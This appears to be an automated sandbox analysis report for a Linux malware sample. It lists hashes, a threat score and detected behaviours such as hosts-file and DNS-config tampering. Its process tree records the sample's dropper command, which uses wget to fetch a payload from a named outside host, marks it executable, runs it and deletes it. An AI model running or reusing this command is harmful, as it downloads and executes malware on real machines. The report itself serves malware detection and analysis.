Overview

overview

10

Static

static

10

113b4afe51...b1f874

linux_amd64

8

Analysis

  • max time kernel
    17632s
  • max time network
    147s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • submitted
    30-06-2022 18:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    113b4afe516f64a1ed6bd4dbe1d9285bf4f740933da857fde9f4b328acb1f874

  • Size

    97KB

  • MD5

    d02777c7b986d0bd06c1f343b71ceb42

  • SHA1

    20075df518726767c57a92c0952ad8c0ef7ca20b

  • SHA256

    113b4afe516f64a1ed6bd4dbe1d9285bf4f740933da857fde9f4b328acb1f874

  • SHA512

    e35df73fb9c1690dd33b34105ad98f7632fe5cfcbc1c77245e9aa749bba01a1860df89030c8ea27a94d560ccf484299f688687ce9a0f7a9608edcdeb269e39a6

Score
8/10

Malware Config

Signatures

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

Processes

  • ./113b4afe516f64a1ed6bd4dbe1d9285bf4f740933da857fde9f4b328acb1f874
    ./113b4afe516f64a1ed6bd4dbe1d9285bf4f740933da857fde9f4b328acb1f874
    1⤵
      PID:593
    • /bin/sh
      /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      1⤵
        PID:594
        • /usr/bin/wget
          wget -q http://gay.energy/.../vivid -O .....
          2⤵
          • Modifies hosts file
          • Writes DNS configuration
          PID:598
        • /bin/chmod
          chmod 777 .....
          2⤵
            PID:599
          • ./.....
            ./.....
            2⤵
              PID:600
            • /bin/sh
              /bin/sh ./.....
              2⤵
                PID:600
              • /bin/rm
                rm -rf .....
                2⤵
                  PID:602

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads